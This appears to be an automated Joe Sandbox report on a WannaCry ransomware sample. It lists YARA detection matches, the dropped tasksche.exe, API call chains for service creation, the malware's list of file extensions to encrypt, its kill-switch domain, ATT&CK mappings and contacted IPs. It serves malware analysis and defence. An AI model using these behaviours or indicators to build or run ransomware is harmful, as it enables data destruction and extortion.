            Source: 1.2.e0R5qxY8Vj.exe.25248e8.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 1.2.e0R5qxY8Vj.exe.25248e8.6.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 0.2.e0R5qxY8Vj.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 0.2.e0R5qxY8Vj.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 0.2.e0R5qxY8Vj.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 1.0.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 1.0.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
            Source: 1.0.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 1.0.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 1.2.e0R5qxY8Vj.exe.2528948.9.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 1.2.e0R5qxY8Vj.exe.2528948.9.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 00000002.00000000.311420520.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 00000001.00000002.577450819.0000000002528000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 00000000.00000000.305025447.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 00000001.00000002.575721583.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 00000001.00000000.308511699.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 00000001.00000002.576523594.0000000001FF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 00000000.00000002.316571024.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exeFile created: C:\WINDOWS\tasksche.exeJump to behavior
            Source: C:\Windows\tasksche.exeCode function: 2_2_00406C402_2_00406C40
            Source: C:\Windows\tasksche.exeCode function: 2_2_00402A762_2_00402A76
            Source: C:\Windows\tasksche.exeCode function: 2_2_00402E7E2_2_00402E7E
            Source: C:\Windows\tasksche.exeCode function: 2_2_0040350F2_2_0040350F
            Source: C:\Windows\tasksche.exeCode function: 2_2_00404C192_2_00404C19
            Source: C:\Windows\tasksche.exeCode function: 2_2_0040541F2_2_0040541F
            Source: C:\Windows\tasksche.exeCode function: 2_2_004037972_2_00403797
            Source: C:\Windows\tasksche.exeCode function: 2_2_004043B72_2_004043B7
            Source: C:\Windows\tasksche.exeCode function: 2_2_004031BC2_2_004031BC
            Source: e0R5qxY8Vj.exeStatic PE information: Resource name: R type: PE32 executable (GUI) Intel 80386, for MS Windows
            Source: tasksche.exe.0.drStatic PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate
            Source: e0R5qxY8Vj.exeReversingLabs: Detection: 100%
            Source: e0R5qxY8Vj.exeVirustotal: Detection: 84%
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exeFile read: C:\Users\user\Desktop\e0R5qxY8Vj.exeJump to behavior
            Source: e0R5qxY8Vj.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\e0R5qxY8Vj.exe C:\Users\user\Desktop\e0R5qxY8Vj.exe
            Source: unknownProcess created: C:\Users\user\Desktop\e0R5qxY8Vj.exe C:\Users\user\Desktop\e0R5qxY8Vj.exe -m security
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /iJump to behavior
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: classification engineClassification label: mal100.rans.expl.evad.winEXE@4/1@2/100
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exeCode function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00407C40
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exeCode function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,1_2_00407C40
            Source: C:\Windows\tasksche.exeCode function: OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,2_2_00401CE8
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exeCode function: 0_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,0_2_00408090
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exeCode function: 1_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,1_2_00408090
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exeCode function: 0_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00407C40
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exeCode function: 0_2_00407CE0 InternetCloseHandle,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,FindResourceA,LoadResource,LockResource,SizeofResource,sprintf,sprintf,sprintf,MoveFileExA,CreateFileA,WriteFile,FindCloseChangeNotification,CreateProcessA,CloseHandle,CloseHandle,0_2_00407CE0
            Source: tasksche.exe, 00000002.00000000.311420520.000000000040E000.00000008.00000001.01000000.00000005.sdmp, e0R5qxY8Vj.exe, tasksche.exe.0.drBinary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: e0R5qxY8Vj.exeStatic file information: File size 3723264 > 1048576
            Source: e0R5qxY8Vj.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x35b000
            Source: C:\Windows\tasksche.exeCode function: 2_2_00407710 push eax; ret 2_2_0040773E
            Source: C:\Windows\tasksche.exeCode function: 2_2_004076C8 push eax; ret 2_2_004076E6
            Source: C:\Windows\tasksche.exeCode function: 2_2_00401A45 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00401A45

            Persistence and Installation Behavior

            barindex
            Drops executables to the windows directory (C:\Windows) and starts them
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exeExecutable created and started: C:\WINDOWS\tasksche.exeJump to behavior
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exeFile created: C:\Windows\tasksche.exeJump to dropped file
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exeFile created: C:\Windows\tasksche.exeJump to dropped file
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exeCode function: 0_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00407C40
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exe TID: 4940Thread sleep count: 107 > 30Jump to behavior
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exe TID: 2256Thread sleep count: 128 > 30Jump to behavior
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exe TID: 4940Thread sleep count: 40 > 30Jump to behavior
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\e0R5qxY8Vj.exeLast function: Thread delayed
            Source: e0R5qxY8Vj.exe, 00000001.00000002.576327069.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, e0R5qxY8Vj.exe, 00000001.00000003.310444822.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, e0R5qxY8Vj.exe, 00000001.00000002.576260847.0000000000E57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: e0R5qxY8Vj.exe, 00000001.00000002.576327069.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, e0R5qxY8Vj.exe, 00000001.00000003.310444822.0000000000E94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,
            Source: C:\Windows\tasksche.exeCode function: 2_2_00401A45 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00401A45
            Source: C:\Windows\tasksche.exeCode function: 2_2_004029CC free,GetProcessHeap,HeapFree,2_2_004029CC

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts2
            Service Execution            		4
            Windows Service            		4
            Windows Service            		12
            Masquerading            		OS Credential Dumping1
            Network Share Discovery            		Remote Services1
            Archive Collected Data            		Exfiltration Over Other Network Medium22
            Encrypted Channel            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            Data Encrypted for Impact
            Default Accounts1
            Native API            		Boot or Logon Initialization Scripts1
            Process Injection            		1
            Virtualization/Sandbox Evasion            		LSASS Memory111
            Security Software Discovery            		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
            Ingress Tool Transfer            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
            Process Injection            		Security Account Manager1
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
            Non-Application Layer Protocol            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
            Obfuscated Files or Information            		NTDS1
            Remote System Discovery            		Distributed Component Object ModelInput CaptureScheduled Transfer3
            Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Software Packing            		LSA Secrets1
            System Information Discovery            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            e0R5qxY8Vj.exe100%ReversingLabsWin32.Ransomware.WannaCry
            e0R5qxY8Vj.exe84%VirustotalBrowse
            e0R5qxY8Vj.exe100%AviraTR/AD.WannaCry.bqdjz
            e0R5qxY8Vj.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Windows\tasksche.exe100%AviraTR/Ransom.Gen
            C:\Windows\tasksche.exe100%Joe Sandbox ML
            C:\Windows\tasksche.exe93%ReversingLabsWin32.Ransomware.WannaCry

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            2.2.tasksche.exe.400000.0.unpack100%AviraTR/Ransom.GenDownload File
            1.2.e0R5qxY8Vj.exe.1ff6104.5.unpack100%AviraHEUR/AGEN.1215476Download File
            1.2.e0R5qxY8Vj.exe.7100a4.1.unpack100%AviraTR/Ransom.GenDownload File
            0.2.e0R5qxY8Vj.exe.400000.0.unpack100%AviraTR/Ransom.GenDownload File
            0.0.e0R5qxY8Vj.exe.400000.0.unpack100%AviraTR/Ransom.GenDownload File
            1.0.e0R5qxY8Vj.exe.7100a4.1.unpack100%AviraTR/Ransom.GenDownload File
            1.2.e0R5qxY8Vj.exe.25198c8.7.unpack100%AviraTR/Ransom.GenDownload File
            1.2.e0R5qxY8Vj.exe.400000.0.unpack100%AviraTR/Ransom.GenDownload File
            1.2.e0R5qxY8Vj.exe.254b96c.8.unpack100%AviraTR/Ransom.GenDownload File
            1.2.e0R5qxY8Vj.exe.2019128.4.unpack100%AviraTR/Ransom.GenDownload File
            0.0.e0R5qxY8Vj.exe.7100a4.1.unpack100%AviraTR/Ransom.GenDownload File
            2.0.tasksche.exe.400000.0.unpack100%AviraTR/Ransom.GenDownload File
            1.2.e0R5qxY8Vj.exe.2528948.9.unpack100%AviraHEUR/AGEN.1215476Download File
            1.0.e0R5qxY8Vj.exe.400000.0.unpack100%AviraTR/Ransom.GenDownload File
            0.2.e0R5qxY8Vj.exe.7100a4.1.unpack100%AviraTR/Ransom.GenDownload File
            1.2.e0R5qxY8Vj.exe.1fe7084.3.unpack100%AviraTR/Ransom.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com100%URL Reputationmalware
            http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/100%URL Reputationmalware
            http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ0%URL Reputationsafe
            http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com00%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
            		104.16.173.80
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/true
              • URL Reputation: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.come0R5qxY8Vj.exetrue
              • URL Reputation: malware
              		unknown
              http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com0e0R5qxY8Vj.exe, 00000001.00000002.576260847.0000000000E57000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJe0R5qxY8Vj.exe, 00000001.00000002.575615817.000000000019C000.00000004.00000010.00020000.00000000.sdmptrue
              • URL Reputation: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              164.9.65.239
              		unknownSweden
              		29217WM-DATASEfalse
              22.45.250.243
              		unknownUnited States
              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              74.122.53.71
              		unknownCanada
              		46525RURALWAVE-LTDCAfalse
              116.2.172.1
              		unknownChina
              		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
              34.65.74.119
              		unknownUnited States
              		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
              193.181.43.211
              		unknownSweden
              		51132ARKADENSEfalse
              28.123.130.99
              		unknownUnited States
              		7922COMCAST-7922USfalse
              142.13.115.180
              		unknownCanada
              		16796MERLIN-NETCAfalse
              81.1.130.247
              		unknownRussian Federation
              		25513ASN-MGTS-USPDRUfalse
              188.76.192.178
              		unknownSpain
              		12479UNI2-ASESfalse
              104.238.21.177
              		unknownUnited States
              		13886CLOUD-SOUTHUSfalse
              167.105.0.225
              		unknownSingapore
              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              96.138.17.155
              		unknownUnited States
              		7922COMCAST-7922USfalse
              202.1.12.240
              		unknownNew Zealand
              		136518WA-GOVERNMENT-AS-APWAGovernmentprojectAUfalse
              55.219.168.104
              		unknownUnited States
              		1541DNIC-ASBLK-01534-01546USfalse
              159.167.177.119
              		unknownUnited Kingdom
              		34058LIFECELL-ASUAfalse
              142.23.12.222
              		unknownCanada
              		3633PROVINCE-OF-BRITISH-COLUMBIACAfalse
              133.220.114.104
              		unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
              9.32.8.225
              		unknownUnited States
              		3356LEVEL3USfalse
              30.69.139.248
              		unknownUnited States
              		7922COMCAST-7922USfalse
              90.164.176.232
              		unknownSpain
              		12479UNI2-ASESfalse
              182.78.18.98
              		unknownIndia
              		9498BBIL-APBHARTIAirtelLtdINfalse
              64.154.38.8
              		unknownUnited States
              		20473AS-CHOOPAUSfalse
              148.15.32.208
              		unknownUnited States
              		3946739408USfalse
              115.20.223.58
              		unknownKorea Republic of
              		4766KIXS-AS-KRKoreaTelecomKRfalse
              104.6.59.86
              		unknownUnited States
              		7018ATT-INTERNET4USfalse
              192.51.21.92
              		unknownJapan4730ODINSOsakaUniversityJPfalse
              61.112.26.184
              		unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
              79.226.139.188
              		unknownGermany
              		3320DTAGInternetserviceprovideroperationsDEfalse
              30.253.159.227
              		unknownUnited States
              		7922COMCAST-7922USfalse
              87.56.93.33
              		unknownDenmark
              		3292TDCTDCASDKfalse
              185.243.50.234
              		unknownIran (ISLAMIC Republic Of)
              		204650ERTEBATATESABETEAVAARVANDIRfalse
              20.192.11.47
              		unknownUnited States
              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              140.34.91.120
              		unknownUnited States
              		668DNIC-AS-00668USfalse
              196.230.219.180
              		unknownTunisia
              		37492ORANGE-TNfalse
              68.198.80.123
              		unknownUnited States
              		6128CABLE-NET-1USfalse
              13.129.44.194
              		unknownUnited States
              		7018ATT-INTERNET4USfalse
              83.203.250.4
              		unknownFrance
              		3215FranceTelecom-OrangeFRfalse
              175.120.81.189
              		unknownKorea Republic of
              		9318SKB-ASSKBroadbandCoLtdKRfalse
              14.40.247.20
              		unknownKorea Republic of
              		4766KIXS-AS-KRKoreaTelecomKRfalse
              117.33.19.95
              		unknownChina
              		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
              43.151.113.116
              		unknownJapan4249LILLY-ASUSfalse
              175.188.169.231
              		unknownChina
              		2510INFOWEBFUJITSULIMITEDJPfalse
              105.230.94.6
              		unknownKenya
              		36926CKL1-ASNKEfalse
              214.162.228.197
              		unknownUnited States
              		721DNIC-ASBLK-00721-00726USfalse
              40.87.205.249
              		unknownUnited States
              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              176.131.100.209
              		unknownFrance
              		5410BOUYGTEL-ISPFRfalse
              213.190.14.5
              		unknownFrance
              		50758AIRBUS-DEFENCE-AND-SPACEFRfalse
              222.249.136.7
              		unknownChina
              		4847CNIX-APChinaNetworksInter-ExchangeCNfalse
              107.37.107.116
              		unknownUnited States
              		16567NETRIX-16567USfalse
              123.253.60.61
              		unknownThailand
              		136523COLODEE-AS-APCOLODEEDIGITALNETWORKCOLTDTHfalse
              87.202.41.206
              		unknownGreece
              		6799OTENET-GRAthens-GreeceGRfalse
              121.51.221.187
              		unknownChina
              		45090CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompafalse
              138.169.221.53
              		unknownUnited States
              		637DNIC-ASBLK-00616-00665USfalse
              66.100.42.193
              		unknownUnited States
              		3561CENTURYLINK-LEGACY-SAVVISUSfalse
              20.144.253.79
              		unknownUnited States
              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              209.149.41.251
              		unknownUnited States
              		6389BELLSOUTH-NET-BLKUSfalse
              187.45.131.141
              		unknownBrazil
              		28136SPACnet-ProjetosAvancadosemComputacaoBRfalse
              102.2.90.243
              		unknownunknown
              		36926CKL1-ASNKEfalse
              104.17.244.81
              		unknownUnited States
              		13335CLOUDFLARENETUStrue
              217.13.213.13
              		unknownRussian Federation
              		12494ASN-POSTLTDRUfalse
              223.246.48.200
              		unknownChina
              		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
              197.204.30.240
              		unknownAlgeria
              		36947ALGTEL-ASDZfalse
              139.248.151.94
              		unknownUnited States
              		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse

              Private

              IP
              192.168.2.148
              192.168.2.149
              192.168.2.146
              192.168.2.147
              192.168.2.140
              192.168.2.141
              192.168.2.144
              192.168.2.145
              192.168.2.142
              192.168.2.143
              192.168.2.159
              192.168.2.157
              192.168.2.158
              192.168.2.151
              192.168.2.152
              192.168.2.150
              192.168.2.155
              192.168.2.156
              192.168.2.153
              192.168.2.154
              192.168.2.126
              192.168.2.127
              192.168.2.124
              192.168.2.125
              192.168.2.128
              192.168.2.129
              192.168.2.122
              192.168.2.123
              192.168.2.120
              192.168.2.121
              192.168.2.137
              192.168.2.138
              192.168.2.135
              192.168.2.136
              192.168.2.139
              192.168.2.130

              General Information

              Joe Sandbox Version:36.0.0 Rainbow Opal
              Analysis ID:719534
              Start date and time:2022-10-10 17:15:05 +02:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 5m 47s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:e0R5qxY8Vj.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:6
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.rans.expl.evad.winEXE@4/1@2/100
              EGA Information:Failed
              HDC Information:
              • Successful, ratio: 99.4% (good quality ratio 90.1%)
              • Quality average: 76.9%
              • Quality standard deviation: 32.6%
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
              • Excluded IPs from analysis (whitelisted): 13.107.4.50
              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comRwsqSjIoeY.exeGet hashmaliciousBrowse
